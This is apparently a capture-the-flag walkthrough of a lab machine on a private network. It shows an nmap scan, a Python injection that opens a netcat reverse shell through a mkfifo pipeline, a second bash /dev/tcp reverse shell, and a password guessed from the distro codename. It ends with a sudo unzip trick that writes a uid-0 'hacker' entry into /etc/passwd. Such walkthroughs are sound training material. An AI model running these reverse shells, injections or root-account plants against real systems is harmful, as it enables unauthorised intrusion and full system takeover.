Scanning the box with nmap –A –T4 –p- 192.168.1.18 –vv

Connecting to port 56563 with telnet:

Ok there is a trick to it, we can use a command instead of a number:
__import__(‘os’).system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444>/tmp/f’)

And on our listening port we get a shell:

We escape the shell with command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ and then we view the file bla2-note:

The pass czNjcjN0 is a base64 code which translate to s3cr3t, now let’s view the /etc/group file:

The password didn’t work with bla or ck04, ok we still have ssh service let’s take a look at it:

The password didn’t work either, but this might work … cat /etc/*-release gave us:

The CODENAME=bionic as the banner said “Enumerate Hostname and Distro’s codename of this box And try to get Secure Shell” now we use bionic as the password:

Ok that’s weird we got the user flag but we got kicked out so let’s try this we going to write bash –p:

Yes it worked, but we got stuck as no commands is displaying results so we going to make another reverse shell using bash -i >& /dev/tcp/192.168.1.11/1234 0>&1

Now user ck04 got sudo privilege:

And the user bla got sudo privilege too:

Ok now we are going to add a new user with a root privilege to the passwd file in the /etc:

Now we copy the /etc/passwd to our location in bla home directory and edit it and put inside it
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now we going to use the unzip command that we got from sudo –l, first we zip it and then unzip it:

Now we su hacker and the password is 123456
